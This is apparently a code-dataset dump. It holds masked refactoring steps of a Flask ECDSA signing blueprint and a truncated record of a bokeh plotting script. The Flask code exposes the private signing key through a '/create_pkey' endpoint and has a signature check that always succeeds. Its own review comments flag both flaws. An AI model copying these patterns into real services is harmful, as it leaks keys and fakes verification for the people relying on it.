token = f.encrypt(str(input['data']).encode())
reverse_signature = bytes.fromhex(input['signature'])
return vk.verify(reverse_signature, token)
except:
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@ecdsa_app.get('/create_pkey')
def private_key():
return {'status': 'success', 'result': sk.to_string().hex()}
@ecdsa_app.post('/op')
def check_op():
input = request.get_json()
operators = ['+', '-', '*', '/', '**', '//', '%']
finaloutput = {}
if input['data']['op'] in operators:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
finaloutput['result'] = str(input['data'])
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator'
return finaloutput
@ecdsa_app.post('/verify_signature')
def signature_verify():
input = request.get_json()
token = f.encrypt(str(input['data']).encode())
signature_ = sk.sign(token)
finaloutput = {}
try:
if vk.verify(signature_, token):
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
except:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'signature is invalid'
return finaloutput
@ecdsa_app.post('/verify')
def verify_fun():
data = request.get_json()
output = check_operator_verify(data)
finaloutput = {}
if output:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator or signature is invalid'
return finaloutput
def check_operator_verify(input):
try:
operators = ['+', '-', '*', '/', '**', '//', '%']
if input['data']['op'] in operators:
token = f.encrypt(str(input['data']).encode())
reverse_signature = bytes.fromhex(input['signature'])
return vk.verify(reverse_signature, token)
except:
pass
<|reserved_special_token_1|>
<|reserved_special_token_0|>
ecdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')
f = Fernet(Fernet.generate_key())
sk = SigningKey.generate(curve=NIST384p)
vk = sk.get_verifying_key()
@ecdsa_app.get('/create_pkey')
def private_key():
return {'status': 'success', 'result': sk.to_string().hex()}
@ecdsa_app.post('/op')
def check_op():
input = request.get_json()
operators = ['+', '-', '*', '/', '**', '//', '%']
finaloutput = {}
if input['data']['op'] in operators:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
finaloutput['result'] = str(input['data'])
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator'
return finaloutput
@ecdsa_app.post('/verify_signature')
def signature_verify():
input = request.get_json()
token = f.encrypt(str(input['data']).encode())
signature_ = sk.sign(token)
finaloutput = {}
try:
if vk.verify(signature_, token):
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
except:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'signature is invalid'
return finaloutput
@ecdsa_app.post('/verify')
def verify_fun():
data = request.get_json()
output = check_operator_verify(data)
finaloutput = {}
if output:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator or signature is invalid'
return finaloutput
def check_operator_verify(input):
try:
operators = ['+', '-', '*', '/', '**', '//', '%']
if input['data']['op'] in operators:
token = f.encrypt(str(input['data']).encode())
reverse_signature = bytes.fromhex(input['signature'])
return vk.verify(reverse_signature, token)
except:
pass
<|reserved_special_token_1|>
from flask import Blueprint, request
from ecdsa import SigningKey, NIST384p
import base64, codecs
from cryptography.fernet import Fernet
ecdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')
f = Fernet(Fernet.generate_key())
sk = SigningKey.generate(curve=NIST384p)
vk = sk.get_verifying_key()
@ecdsa_app.get('/create_pkey')
def private_key():
return {'status': 'success', 'result': sk.to_string().hex()}
@ecdsa_app.post('/op')
def check_op():
input = request.get_json()
operators = ['+', '-', '*', '/', '**', '//', '%']
finaloutput = {}
if input['data']['op'] in operators:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
finaloutput['result'] = str(input['data'])
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator'
return finaloutput
@ecdsa_app.post('/verify_signature')
def signature_verify():
input = request.get_json()
token = f.encrypt(str(input['data']).encode())
signature_ = sk.sign(token)
finaloutput = {}
try:
if vk.verify(signature_, token):
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
except:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'signature is invalid'
return finaloutput
@ecdsa_app.post('/verify')
def verify_fun():
data = request.get_json()
output = check_operator_verify(data)
finaloutput = {}
if output:
finaloutput['status'] = 'success'
finaloutput['message'] = 'successfully verified'
else:
finaloutput['status'] = 'failure'
finaloutput['message'] = 'invalid operator or signature is invalid'
return finaloutput
def check_operator_verify(input):
try:
operators = ['+', '-', '*', '/', '**', '//', '%']
if input['data']['op'] in operators:
token = f.encrypt(str(input['data']).encode())
reverse_signature = bytes.fromhex(input['signature'])
return vk.verify(reverse_signature, token)
except:
pass
<|reserved_special_token_1|>
from flask import Blueprint, request
from ecdsa import SigningKey, NIST384p
import base64, codecs
from cryptography.fernet import Fernet
# Flask blueprint: all routes below are mounted under /ecdsa_app.
ecdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')
# Fresh symmetric Fernet key per process start — tokens encrypted in one
# run cannot be decrypted after a restart.
f = Fernet(Fernet.generate_key())
# ECDSA signing/verifying key pair (NIST P-384 curve), also per-process.
sk = SigningKey.generate(curve=NIST384p)
vk = sk.get_verifying_key()
@ecdsa_app.get('/create_pkey')
def private_key():
    """Return the server's ECDSA private key as a hex string.

    NOTE(review): exposing the *private* key over HTTP defeats the point
    of the signature scheme — confirm this endpoint is for demos only.
    """
    hex_key = sk.to_string().hex()
    return {'status': 'success', 'result': hex_key}
@ecdsa_app.post('/op')
def check_op():
    """Validate that the posted JSON payload carries a supported operator.

    Expects a body of the form ``{"data": {"op": "+", ...}}``.  Returns a
    success dict echoing ``str(data)`` when ``op`` is one of the arithmetic
    operators, otherwise a failure dict with an explanatory message.
    """
    # Renamed from `input`, which shadowed the builtin.
    payload = request.get_json()
    operators = ['+', '-', '*', '/', '**', '//', '%']
    # Guard against a missing/malformed body: previously a payload without
    # 'data' raised KeyError and surfaced as a 500; now it reports failure.
    data = (payload or {}).get('data') or {}
    if data.get('op') in operators:
        return {
            'status': 'success',
            'message': 'successfully verified',
            'result': str(data),
        }
    return {'status': 'failure', 'message': 'invalid operator'}
@ecdsa_app.post('/verify_signature')
def signature_verify():
    """Sign an encrypted token derived from the posted data and verify it.

    NOTE(review): this signs the freshly-built token with the server's own
    key and then verifies that same signature, so it always succeeds; the
    client's signature (the commented-out line) is never used — confirm
    the intended contract of this endpoint.
    """
    # Renamed from `input`, which shadowed the builtin.
    payload = request.get_json()
    token = f.encrypt(str(payload['data']).encode())
    #reverse_signature = bytes.fromhex(payload["signature"])
    signature_ = sk.sign(token)
    finaloutput = {}
    try:
        if (vk.verify(signature_, token)):
            finaloutput['status'] = 'success'
            finaloutput['message'] = 'successfully verified'
    # Narrowed from a bare `except:`, which also trapped SystemExit and
    # KeyboardInterrupt; verify() raises on an invalid signature.
    except Exception:
        finaloutput['status'] = 'failure'
        finaloutput['message'] = 'signature is invalid'
    return finaloutput
@ecdsa_app.post('/verify')
def verify_fun():
    """Verify the posted payload's operator and signature.

    Delegates the actual check to ``check_operator_verify`` and wraps its
    truthiness in a status/message response dict.
    """
    payload = request.get_json()
    verified = check_operator_verify(payload)
    if verified:
        return {'status': 'success', 'message': 'successfully verified'}
    return {'status': 'failure', 'message': 'invalid operator or signature is invalid'}
def check_operator_verify(input):
    """Check the payload's operator and verify its ECDSA signature.

    Args:
        input: Parsed request body containing ``input['data']['op']`` (an
            arithmetic operator string) and ``input['signature']`` (a
            hex-encoded signature).

    Returns:
        True when the operator is supported and the signature verifies;
        None (falsy) otherwise — unsupported operator, malformed payload,
        or failed verification.

    NOTE(review): ``f.encrypt`` embeds a random IV/timestamp, so the token
    recomputed here can never equal a token the client signed earlier —
    confirm the intended signing scheme.
    """
    try:
        # Set membership instead of a list scan.
        operators = {'+', '-', '*', '/', '**', '//', '%'}
        if input['data']['op'] in operators:
            token = f.encrypt(str(input['data']).encode())
            reverse_signature = bytes.fromhex(input['signature'])
            return vk.verify(reverse_signature, token)
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; failure paths yield None (falsy).
        return None
|
flexible
|
{
"blob_id": "4eb7abb24451f3f895d0731de7b29a85d90c1539",
"index": 8246,
"step-1": "<mask token>\n\n\n@ecdsa_app.get('/create_pkey')\ndef private_key():\n return {'status': 'success', 'result': sk.to_string().hex()}\n\n\n@ecdsa_app.post('/op')\ndef check_op():\n input = request.get_json()\n operators = ['+', '-', '*', '/', '**', '//', '%']\n finaloutput = {}\n if input['data']['op'] in operators:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n finaloutput['result'] = str(input['data'])\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator'\n return finaloutput\n\n\n<mask token>\n\n\n@ecdsa_app.post('/verify')\ndef verify_fun():\n data = request.get_json()\n output = check_operator_verify(data)\n finaloutput = {}\n if output:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator or signature is invalid'\n return finaloutput\n\n\ndef check_operator_verify(input):\n try:\n operators = ['+', '-', '*', '/', '**', '//', '%']\n if input['data']['op'] in operators:\n token = f.encrypt(str(input['data']).encode())\n reverse_signature = bytes.fromhex(input['signature'])\n return vk.verify(reverse_signature, token)\n except:\n pass\n",
"step-2": "<mask token>\n\n\n@ecdsa_app.get('/create_pkey')\ndef private_key():\n return {'status': 'success', 'result': sk.to_string().hex()}\n\n\n@ecdsa_app.post('/op')\ndef check_op():\n input = request.get_json()\n operators = ['+', '-', '*', '/', '**', '//', '%']\n finaloutput = {}\n if input['data']['op'] in operators:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n finaloutput['result'] = str(input['data'])\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator'\n return finaloutput\n\n\n@ecdsa_app.post('/verify_signature')\ndef signature_verify():\n input = request.get_json()\n token = f.encrypt(str(input['data']).encode())\n signature_ = sk.sign(token)\n finaloutput = {}\n try:\n if vk.verify(signature_, token):\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n except:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'signature is invalid'\n return finaloutput\n\n\n@ecdsa_app.post('/verify')\ndef verify_fun():\n data = request.get_json()\n output = check_operator_verify(data)\n finaloutput = {}\n if output:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator or signature is invalid'\n return finaloutput\n\n\ndef check_operator_verify(input):\n try:\n operators = ['+', '-', '*', '/', '**', '//', '%']\n if input['data']['op'] in operators:\n token = f.encrypt(str(input['data']).encode())\n reverse_signature = bytes.fromhex(input['signature'])\n return vk.verify(reverse_signature, token)\n except:\n pass\n",
"step-3": "<mask token>\necdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')\nf = Fernet(Fernet.generate_key())\nsk = SigningKey.generate(curve=NIST384p)\nvk = sk.get_verifying_key()\n\n\n@ecdsa_app.get('/create_pkey')\ndef private_key():\n return {'status': 'success', 'result': sk.to_string().hex()}\n\n\n@ecdsa_app.post('/op')\ndef check_op():\n input = request.get_json()\n operators = ['+', '-', '*', '/', '**', '//', '%']\n finaloutput = {}\n if input['data']['op'] in operators:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n finaloutput['result'] = str(input['data'])\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator'\n return finaloutput\n\n\n@ecdsa_app.post('/verify_signature')\ndef signature_verify():\n input = request.get_json()\n token = f.encrypt(str(input['data']).encode())\n signature_ = sk.sign(token)\n finaloutput = {}\n try:\n if vk.verify(signature_, token):\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n except:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'signature is invalid'\n return finaloutput\n\n\n@ecdsa_app.post('/verify')\ndef verify_fun():\n data = request.get_json()\n output = check_operator_verify(data)\n finaloutput = {}\n if output:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator or signature is invalid'\n return finaloutput\n\n\ndef check_operator_verify(input):\n try:\n operators = ['+', '-', '*', '/', '**', '//', '%']\n if input['data']['op'] in operators:\n token = f.encrypt(str(input['data']).encode())\n reverse_signature = bytes.fromhex(input['signature'])\n return vk.verify(reverse_signature, token)\n except:\n pass\n",
"step-4": "from flask import Blueprint, request\nfrom ecdsa import SigningKey, NIST384p\nimport base64, codecs\nfrom cryptography.fernet import Fernet\necdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')\nf = Fernet(Fernet.generate_key())\nsk = SigningKey.generate(curve=NIST384p)\nvk = sk.get_verifying_key()\n\n\n@ecdsa_app.get('/create_pkey')\ndef private_key():\n return {'status': 'success', 'result': sk.to_string().hex()}\n\n\n@ecdsa_app.post('/op')\ndef check_op():\n input = request.get_json()\n operators = ['+', '-', '*', '/', '**', '//', '%']\n finaloutput = {}\n if input['data']['op'] in operators:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n finaloutput['result'] = str(input['data'])\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator'\n return finaloutput\n\n\n@ecdsa_app.post('/verify_signature')\ndef signature_verify():\n input = request.get_json()\n token = f.encrypt(str(input['data']).encode())\n signature_ = sk.sign(token)\n finaloutput = {}\n try:\n if vk.verify(signature_, token):\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n except:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'signature is invalid'\n return finaloutput\n\n\n@ecdsa_app.post('/verify')\ndef verify_fun():\n data = request.get_json()\n output = check_operator_verify(data)\n finaloutput = {}\n if output:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator or signature is invalid'\n return finaloutput\n\n\ndef check_operator_verify(input):\n try:\n operators = ['+', '-', '*', '/', '**', '//', '%']\n if input['data']['op'] in operators:\n token = f.encrypt(str(input['data']).encode())\n reverse_signature = bytes.fromhex(input['signature'])\n return vk.verify(reverse_signature, token)\n except:\n pass\n",
"step-5": "from flask import Blueprint, request\nfrom ecdsa import SigningKey, NIST384p\nimport base64, codecs\nfrom cryptography.fernet import Fernet\n\necdsa_app = Blueprint('ecdsa_app', __name__, url_prefix='/ecdsa_app')\nf = Fernet(Fernet.generate_key())\n\nsk = SigningKey.generate(curve=NIST384p)\nvk = sk.get_verifying_key()\n\n\n\n\n@ecdsa_app.get('/create_pkey')\ndef private_key():\n #reverse = bytes.fromhex(sk.to_string().hex()) \n return {\"status\":\"success\", \"result\":sk.to_string().hex()}\n\n@ecdsa_app.post('/op')\ndef check_op():\n input = request.get_json()\n operators = ['+', '-', '*', '/', '**', '//', '%']\n finaloutput = {}\n if input['data']['op'] in operators:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n finaloutput['result'] = str(input['data'])\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator'\n return finaloutput\n\n@ecdsa_app.post('/verify_signature')\ndef signature_verify():\n\n input = request.get_json()\n token = f.encrypt(str(input['data']).encode())\n #reverse_signature = bytes.fromhex(input[\"signature\"])\n signature_ = sk.sign(token)\n finaloutput = {}\n try:\n if (vk.verify(signature_, token)):\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n except:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'signature is invalid'\n\n return finaloutput\n\n\n@ecdsa_app.post('/verify')\ndef verify_fun():\n data = request.get_json()\n output = check_operator_verify(data)\n finaloutput ={}\n if output:\n finaloutput['status'] = 'success'\n finaloutput['message'] = 'successfully verified'\n else:\n finaloutput['status'] = 'failure'\n finaloutput['message'] = 'invalid operator or signature is invalid'\n return finaloutput\n\ndef check_operator_verify(input):\n try:\n operators = ['+', '-', '*', '/', '**', '//', '%']\n if input['data']['op'] in operators:\n token = f.encrypt(str(input['data']).encode())\n 
reverse_signature = bytes.fromhex(input[\"signature\"])\n return (vk.verify(reverse_signature, token))\n except:\n pass\n\n ",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
def read_summary(summary_file):
return json.loads(open(summary_file, 'r').read())
def get_descriptions(summary):
d = {}
for o in summary['ontology_events']:
print(o)
d[o] = summary['ontology_events'][o].get('description', summary[
'ontology_events'][o]['method']) + '_' + str(o)
return d
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events, 'genes': gene_counts, 'terms': term_counts,
'rxns': rxn_counts}
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,
title='Unique Counts per Annotation Event', tools=
'wheel_zoom,box_zoom,reset,save')
p.hbar(y='x', right='counts', height=0.9, source=source, line_color=
'black', fill_color=factor_cmap('x', palette=inferno(len(types)),
factors=types, start=1, end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = 'horizontal'
p.yaxis.subgroup_label_orientation = 'horizontal'
p.yaxis.group_label_orientation = 'horizontal'
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = '12pt'
p.yaxis.major_label_text_font_size = '12pt'
p.yaxis.group_text_font_size = '12pt'
p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))
return p
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_summary(summary_file):
return json.loads(open(summary_file, 'r').read())
def get_descriptions(summary):
d = {}
for o in summary['ontology_events']:
print(o)
d[o] = summary['ontology_events'][o].get('description', summary[
'ontology_events'][o]['method']) + '_' + str(o)
return d
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events, 'genes': gene_counts, 'terms': term_counts,
'rxns': rxn_counts}
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,
title='Unique Counts per Annotation Event', tools=
'wheel_zoom,box_zoom,reset,save')
p.hbar(y='x', right='counts', height=0.9, source=source, line_color=
'black', fill_color=factor_cmap('x', palette=inferno(len(types)),
factors=types, start=1, end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = 'horizontal'
p.yaxis.subgroup_label_orientation = 'horizontal'
p.yaxis.group_label_orientation = 'horizontal'
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = '12pt'
p.yaxis.major_label_text_font_size = '12pt'
p.yaxis.group_text_font_size = '12pt'
p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))
return p
<|reserved_special_token_0|>
output_file('totals.html', title='Totals')
<|reserved_special_token_0|>
show(totals)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def read_summary(summary_file):
return json.loads(open(summary_file, 'r').read())
def get_descriptions(summary):
d = {}
for o in summary['ontology_events']:
print(o)
d[o] = summary['ontology_events'][o].get('description', summary[
'ontology_events'][o]['method']) + '_' + str(o)
return d
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events, 'genes': gene_counts, 'terms': term_counts,
'rxns': rxn_counts}
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,
title='Unique Counts per Annotation Event', tools=
'wheel_zoom,box_zoom,reset,save')
p.hbar(y='x', right='counts', height=0.9, source=source, line_color=
'black', fill_color=factor_cmap('x', palette=inferno(len(types)),
factors=types, start=1, end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = 'horizontal'
p.yaxis.subgroup_label_orientation = 'horizontal'
p.yaxis.group_label_orientation = 'horizontal'
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = '12pt'
p.yaxis.major_label_text_font_size = '12pt'
p.yaxis.group_text_font_size = '12pt'
p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))
return p
summary = read_summary('PT19DW.7.json')
output_file('totals.html', title='Totals')
totals = plot_totals(summary)
show(totals)
<|reserved_special_token_1|>
import json
from bokeh.plotting import figure, output_file
from bokeh.io import show
from bokeh.palettes import inferno
from bokeh.models import ColumnDataSource, FactorRange
from bokeh.transform import factor_cmap
from bokeh.models import HoverTool
def read_summary(summary_file):
return json.loads(open(summary_file, 'r').read())
def get_descriptions(summary):
d = {}
for o in summary['ontology_events']:
print(o)
d[o] = summary['ontology_events'][o].get('description', summary[
'ontology_events'][o]['method']) + '_' + str(o)
return d
def plot_totals(summary):
descriptions = get_descriptions(summary)
totals = {}
for event in summary['ontology_events'].keys():
totals[str(event)] = {'genes': [], 'rxns': [], 'terms': []}
for gene in summary['genes']:
for term in summary['genes'][gene]['terms']:
for event in summary['genes'][gene]['terms'][term]:
totals[str(event)]['genes'].append(gene)
for term in summary['terms']:
for event in summary['terms'][term]:
totals[str(event)]['terms'].append(term)
for rxn in summary['rxns']:
for event in summary['rxns'][rxn]:
totals[str(event)]['rxns'].append(rxn)
events = []
types = ['genes', 'terms', 'rxns']
gene_counts = []
rxn_counts = []
term_counts = []
for event in totals:
events.append(descriptions[event])
gene_counts.append(len(set(totals[event]['genes'])))
rxn_counts.append(len(set(totals[event]['rxns'])))
term_counts.append(len(set(totals[event]['terms'])))
data = {'events': events, 'genes': gene_counts, 'terms': term_counts,
'rxns': rxn_counts}
x = [(event, type) for event in events for type in types]
counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
source = ColumnDataSource(data=dict(x=x, counts=counts))
p = figure(y_range=FactorRange(*x), plot_height=400, plot_width=1000,
title='Unique Counts per Annotation Event', tools=
'wheel_zoom,box_zoom,reset,save')
p.hbar(y='x', right='counts', height=0.9, source=source, line_color=
'black', fill_color=factor_cmap('x', palette=inferno(len(types)),
factors=types, start=1, end=2))
p.x_range.start = 0
p.y_range.range_padding = 0.1
p.yaxis.major_label_orientation = 'horizontal'
p.yaxis.subgroup_label_orientation = 'horizontal'
p.yaxis.group_label_orientation = 'horizontal'
p.ygrid.grid_line_color = None
p.title.text_font_size = '12pt'
p.xaxis.major_label_text_font_size = '12pt'
p.yaxis.major_label_text_font_size = '12pt'
p.yaxis.group_text_font_size = '12pt'
p.add_tools(HoverTool(tooltips=[('Type', '@x'), ('Count', '@counts')]))
return p
summary = read_summary('PT19DW.7.json')
output_file('totals.html', title='Totals')
totals = plot_totals(summary)
show(totals)
<|reserved_special_token_1|>
import json
from bokeh.plotting import figure, output_file
from bokeh.io import show
from bokeh.palettes import inferno
from bokeh.models import ColumnDataSource, FactorRange
from bokeh.transform import factor_cmap
from bokeh.models import HoverTool
# from bokeh.io import export_svgs
def read_summary(summary_file):
    """Load an annotation summary from a JSON file.

    Args:
        summary_file: Path to the JSON summary produced upstream.

    Returns:
        The deserialized summary as nested dicts/lists.
    """
    # Context manager closes the handle deterministically; the original
    # leaked the file object returned by open().
    with open(summary_file, "r") as fh:
        return json.load(fh)
def get_descriptions(summary):
    """Map each ontology event id to a unique display label.

    The label is the event's 'description' (falling back to its 'method')
    suffixed with '_<event id>' so repeated descriptions stay distinct.

    Args:
        summary: Parsed summary dict with an 'ontology_events' mapping.

    Returns:
        dict mapping event id -> label string.
    """
    # Stray debug print(o) removed; deep lookup hoisted to one local.
    events = summary["ontology_events"]
    return {
        o: events[o].get('description', events[o]['method']) + '_' + str(o)
        for o in events
    }
def plot_totals(summary):
    """Build a horizontal grouped bar chart of unique genes/terms/rxns per event.

    Args:
        summary: Parsed summary dict with 'ontology_events', 'genes',
            'terms' and 'rxns' sections (see read_summary).

    Returns:
        A bokeh figure; the caller is responsible for output_file()/show().
    """
    descriptions = get_descriptions(summary)
    # One bucket of genes/rxns/terms per ontology event id.
    totals = {}
    for event in summary['ontology_events'].keys():
        totals[str(event)] = {'genes': [],
                              'rxns': [],
                              'terms': []}
    # genes: collect every gene annotated under each event
    # (duplicates kept here; de-duplicated later via set()).
    for gene in summary['genes']:
        for term in summary['genes'][gene]['terms']:
            for event in summary['genes'][gene]['terms'][term]:
                totals[str(event)]['genes'].append(gene)
    # terms per event
    for term in summary['terms']:
        for event in summary['terms'][term]:
            totals[str(event)]['terms'].append(term)
    # rxns per event
    for rxn in summary['rxns']:
        for event in summary['rxns'][rxn]:
            totals[str(event)]['rxns'].append(rxn)
    # sums: unique counts per event, kept in parallel lists by position.
    events = []
    types = ['genes', 'terms', 'rxns']
    gene_counts = []
    rxn_counts = []
    term_counts = []
    for event in totals:
        events.append(descriptions[event])
        gene_counts.append(len(set(totals[event]['genes'])))
        rxn_counts.append(len(set(totals[event]['rxns'])))
        term_counts.append(len(set(totals[event]['terms'])))
    data = {'events': events,
            'genes': gene_counts,
            'terms': term_counts,
            'rxns': rxn_counts
            }
    # Nested categorical factors: one (event, type) pair per bar.
    x = [(event, type) for event in events for type in types]
    # Interleave counts to match the (event, type) factor order above.
    counts = sum(zip(data['genes'], data['terms'], data['rxns']), ())
    source = ColumnDataSource(data=dict(x=x, counts=counts))
    p = figure(y_range=FactorRange(*x),
               plot_height=400,
               plot_width=1000,
               title="Unique Counts per Annotation Event",
               tools="wheel_zoom,box_zoom,reset,save")
    # Horizontal bars colour-coded by type (genes/terms/rxns); start/end
    # slice the (event, type) factor tuple so colour follows the type part.
    p.hbar(y='x',
           right='counts',
           height=0.9,
           source=source,
           line_color="black",
           fill_color=factor_cmap('x',
                                  palette=inferno(len(types)),
                                  factors=types,
                                  start=1,
                                  end=2))
    p.x_range.start = 0
    p.y_range.range_padding = 0.1
    p.yaxis.major_label_orientation = "horizontal"
    p.yaxis.subgroup_label_orientation = "horizontal"
    p.yaxis.group_label_orientation = "horizontal"
    p.ygrid.grid_line_color = None
    p.title.text_font_size = '12pt'
    p.xaxis.major_label_text_font_size = "12pt"
    p.yaxis.major_label_text_font_size = "12pt"
    p.yaxis.group_text_font_size = "12pt"
    # Tooltip shows the hovered (event, type) factor and its count.
    p.add_tools(HoverTool(tooltips=[("Type", "@x"), ("Count", "@counts")]))
    return(p)
# Render the per-event annotation totals chart for the chosen summary file.
summary = read_summary("PT19DW.7.json")
# Write the chart to totals.html and open it in the browser.
output_file("totals.html", title="Totals")
totals = plot_totals(summary)
show(totals)
|
flexible
|
{
"blob_id": "7036ae5f74e6cb04518c20bb52122a1dfae76f23",
"index": 712,
